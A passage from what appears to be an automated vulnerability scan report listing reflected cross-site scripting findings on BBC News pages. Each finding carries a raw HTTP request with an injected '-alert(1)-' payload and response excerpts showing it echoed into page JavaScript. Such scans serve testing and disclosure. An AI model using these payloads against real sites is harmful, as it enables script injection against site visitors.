GET /2/hi/programmes/world_news_america/9291805.stm?f10c6'-alert(1)-'8a29b8fd6c4=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:34:56 GMT
Keep-Alive: timeout=10, max=785
Expires: Thu, 16 Dec 2010 19:34:56 GMT
Connection: close
Set-Cookie: BBC-UID=f46d20aab6593e6010f60470f10cee6fc4059f51e03091d9fb1b02ad741f614e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:34:56 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f46d20aab6593e6010f60470f10cee6fc4059f51e03091d9fb1b02ad741f614e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:34:56 GMT; path=/; domain=bbc.co.uk;
Content-Length: 39541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528096000,
       editionToServe: 'international',
       queryString: 'f10c6'-alert(1)-'8a29b8fd6c4=1',
       referrer: null,
       section: null,
       sectionPath: '/programmes/world_news_america',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9291805',
       assetType: null,
   
...[SNIP]...

2.26. http://news.bbc.co.uk/2/hi/programmes/world_news_america/default.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/world_news_america/default.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62b35'-alert(1)-'822c55db67a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/world_news_america/default.stm?62b35'-alert(1)-'822c55db67a=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:01 GMT
Keep-Alive: timeout=10, max=794
Expires: Thu, 16 Dec 2010 19:35:01 GMT
Connection: close
Set-Cookie: BBC-UID=742dc00a16794e25702410303130d6e4c311be7c30d061dab49bda85c3d15a4a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:01 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=742dc00a16794e25702410303130d6e4c311be7c30d061dab49bda85c3d15a4a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:01 GMT; path=/; domain=bbc.co.uk;
Content-Length: 69739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528101000,
       editionToServe: 'international',
       queryString: '62b35'-alert(1)-'822c55db67a=1',
       referrer: null,
       section: null,
       sectionPath: '/programmes/world_news_america',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '-',
       assetType: null,
       uri:
...[SNIP]...

2.27. http://news.bbc.co.uk/2/hi/programmes/world_news_america/highlights/default.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/world_news_america/highlights/default.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e90a'-alert(1)-'f842894b386 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/world_news_america/highlights/default.stm?8e90a'-alert(1)-'f842894b386=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:00 GMT
Keep-Alive: timeout=10, max=678
Expires: Thu, 16 Dec 2010 19:35:00 GMT
Connection: close
Set-Cookie: BBC-UID=345d10ba5679fe3490f6476661b48268b488bbaa503031c9cbcbc33fb7142a280Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:00 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=345d10ba5679fe3490f6476661b48268b488bbaa503031c9cbcbc33fb7142a280Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:00 GMT; path=/; domain=bbc.co.uk;
Content-Length: 62684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528100000,
       editionToServe: 'international',
       queryString: '8e90a'-alert(1)-'f842894b386=1',
       referrer: null,
       section: null,
       sectionPath: '/programmes/world_news_america/highlights',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '-',
       assetType: nul
...[SNIP]...

2.28. http://news.bbc.co.uk/sport/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2756'-alert(1)-'4696914252f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport/?b2756'-alert(1)-'4696914252f=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:15 GMT
Keep-Alive: timeout=10, max=676
Expires: Thu, 16 Dec 2010 19:35:15 GMT
Connection: close
Set-Cookie: BBC-UID=643d207a16a98f23e026dd30a1017b0004d3bf6e101021f98bdbd37f37e4ca580Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=643d207a16a98f23e026dd30a1017b0004d3bf6e101021f98bdbd37f37e4ca580Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:15 GMT; path=/; domain=bbc.co.uk;
Content-Length: 87602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528115000,
       editionToServe: 'international',
       queryString: 'b2756'-alert(1)-'4696914252f=1',
       referrer: null,
       section: null,
       sectionPath: '/',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '-',
       assetType: null,
       uri: '/sport/',
       country: 'us',
...[SNIP]...

2.29. http://news.bbc.co.uk/sport1/hi/football/9295057.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport1/hi/football/9295057.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d726'-alert(1)-'c87ede84cfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport1/hi/football/9295057.stm?2d726'-alert(1)-'c87ede84cfd=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:37 GMT
Keep-Alive: timeout=10, max=793
Expires: Thu, 16 Dec 2010 19:35:37 GMT
Connection: close
Set-Cookie: BBC-UID=749d902ae60ac019fd7823cdc1e82ab5c16bd936a01021cf7299803cf6e0a7560Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:37 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=749d902ae60ac019fd7823cdc1e82ab5c16bd936a01021cf7299803cf6e0a7560Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:37 GMT; path=/; domain=bbc.co.uk;
Content-Length: 117197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528137000,
       editionToServe: 'international',
       queryString: '2d726'-alert(1)-'c87ede84cfd=1',
       referrer: null,
       section: null,
       sectionPath: '/football',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9295057',
       assetType: null,
       uri: '/sport2/hi/fo
...[SNIP]...

2.30. http://news.bbc.co.uk/sport2/hi/boxing/9293972.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/boxing/9293972.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5360'-alert(1)-'950e9af3059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/boxing/9293972.stm?c5360'-alert(1)-'950e9af3059=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:24 GMT
Keep-Alive: timeout=10, max=677
Expires: Thu, 16 Dec 2010 19:35:24 GMT
Connection: close
Set-Cookie: BBC-UID=942d808ac6596f5cf3cc957b61b308d4201fba1d2050616ac48b6a052151fade0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:24 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=942d808ac6596f5cf3cc957b61b308d4201fba1d2050616ac48b6a052151fade0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 50908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528124000,
       editionToServe: 'international',
       queryString: 'c5360'-alert(1)-'950e9af3059=1',
       referrer: null,
       section: null,
       sectionPath: '/boxing',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9293972',
       assetType: null,
       uri: '/sport2/hi/boxi
...[SNIP]...

2.31. http://news.bbc.co.uk/sport2/hi/cricket/9287509.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cricket/9287509.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a6c9'-alert(1)-'f9c94a68645 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cricket/9287509.stm?7a6c9'-alert(1)-'f9c94a68645=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:25 GMT
Keep-Alive: timeout=10, max=726
Expires: Thu, 16 Dec 2010 19:35:25 GMT
Connection: close
Set-Cookie: BBC-UID=14bd207a56992f1d3d30a966510951ffb79a0f64d0d09293d76d6a10f573ca0e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:25 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=14bd207a56992f1d3d30a966510951ffb79a0f64d0d09293d76d6a10f573ca0e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:25 GMT; path=/; domain=bbc.co.uk;
Content-Length: 49890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528125000,
       editionToServe: 'international',
       queryString: '7a6c9'-alert(1)-'f9c94a68645=1',
       referrer: null,
       section: null,
       sectionPath: '/cricket',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9287509',
       assetType: null,
       uri: '/sport2/hi/cri
...[SNIP]...

2.32. http://news.bbc.co.uk/sport2/hi/cricket/other_international/australia/9294389.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cricket/other_international/australia/9294389.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1318a'-alert(1)-'91be32fdb6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cricket/other_international/australia/9294389.stm?1318a'-alert(1)-'91be32fdb6f=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:27 GMT
Keep-Alive: timeout=10, max=730
Expires: Thu, 16 Dec 2010 19:35:27 GMT
Connection: close
Set-Cookie: BBC-UID=f45d308a26e95f2ff0043eba113db41723f24ba7e0e0b1c98bdbd39fab44529e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f45d308a26e95f2ff0043eba113db41723f24ba7e0e0b1c98bdbd39fab44529e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 59438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528127000,
       editionToServe: 'international',
       queryString: '1318a'-alert(1)-'91be32fdb6f=1',
       referrer: null,
       section: null,
       sectionPath: '/cricket/other_international/australia',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9294389',
       assetType:
...[SNIP]...

2.33. http://news.bbc.co.uk/sport2/hi/football/europe/9293627.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/europe/9293627.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8070'-alert(1)-'c12f6873c94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/europe/9293627.stm?f8070'-alert(1)-'c12f6873c94=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:27 GMT
Keep-Alive: timeout=10, max=797
Expires: Thu, 16 Dec 2010 19:35:27 GMT
Connection: close
Set-Cookie: BBC-UID=941d609a36996fcfb037b1aea1a1163730fdbb8260d001a96beb53ff4704fac80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=941d609a36996fcfb037b1aea1a1163730fdbb8260d001a96beb53ff4704fac80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528127000,
       editionToServe: 'international',
       queryString: 'f8070'-alert(1)-'c12f6873c94=1',
       referrer: null,
       section: null,
       sectionPath: '/football/europe',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9293627',
       assetType: null,
       uri: '/sport
...[SNIP]...

2.34. http://news.bbc.co.uk/sport2/hi/football/teams/c/chelsea/9295171.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/teams/c/chelsea/9295171.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 272c4'-alert(1)-'11b4a23a8ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/teams/c/chelsea/9295171.stm?272c4'-alert(1)-'11b4a23a8ab=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:28 GMT
Keep-Alive: timeout=10, max=641
Expires: Thu, 16 Dec 2010 19:35:28 GMT
Connection: close
Set-Cookie: BBC-UID=140d803ae65a90d00a3673704142ed8f0510ca4d80d042c3774d13e546a195060Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:28 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=140d803ae65a90d00a3673704142ed8f0510ca4d80d042c3774d13e546a195060Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:28 GMT; path=/; domain=bbc.co.uk;
Content-Length: 53481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528128000,
       editionToServe: 'international',
       queryString: '272c4'-alert(1)-'11b4a23a8ab=1',
       referrer: null,
       section: null,
       sectionPath: '/football/teams/c/chelsea',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9295171',
       assetType: null,
       uri
...[SNIP]...

2.35. http://news.bbc.co.uk/sport2/hi/football/teams/m/motherwell/9294234.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/teams/m/motherwell/9294234.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7902e'-alert(1)-'472cd407139 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/teams/m/motherwell/9294234.stm?7902e'-alert(1)-'472cd407139=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:31 GMT
Keep-Alive: timeout=10, max=789
Expires: Thu, 16 Dec 2010 19:35:31 GMT
Connection: close
Set-Cookie: BBC-UID=149d609a765a9063000618e1e1c2046abe810aa7c0b0e283978d2a3038f1db8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:31 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=149d609a765a9063000618e1e1c2046abe810aa7c0b0e283978d2a3038f1db8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:31 GMT; path=/; domain=bbc.co.uk;
Content-Length: 52827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528131000,
       editionToServe: 'international',
       queryString: '7902e'-alert(1)-'472cd407139=1',
       referrer: null,
       section: null,
       sectionPath: '/football/teams/m/motherwell',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9294234',
       assetType: null,
       
...[SNIP]...

2.36. http://news.bbc.co.uk/sport2/hi/golf/9294562.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/golf/9294562.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa485'-alert(1)-'09740cc8db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/golf/9294562.stm?aa485'-alert(1)-'09740cc8db=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:29 GMT
Keep-Alive: timeout=10, max=673
Expires: Thu, 16 Dec 2010 19:35:29 GMT
Connection: close
Set-Cookie: BBC-UID=849dc03a561af091dd4abc4911a6abc202c28739f060a1c90b9b03a44114babe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:29 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=849dc03a561af091dd4abc4911a6abc202c28739f060a1c90b9b03a44114babe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:29 GMT; path=/; domain=bbc.co.uk;
Content-Length: 49886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528129000,
       editionToServe: 'international',
       queryString: 'aa485'-alert(1)-'09740cc8db=1',
       referrer: null,
       section: null,
       sectionPath: '/golf',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9294562',
       assetType: null,
       uri: '/sport2/hi/golf/9
...[SNIP]...

2.37. http://news.bbc.co.uk/weather/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 462dd'-alert(1)-'47f7f6e1ce0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/?462dd'-alert(1)-'47f7f6e1ce0=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
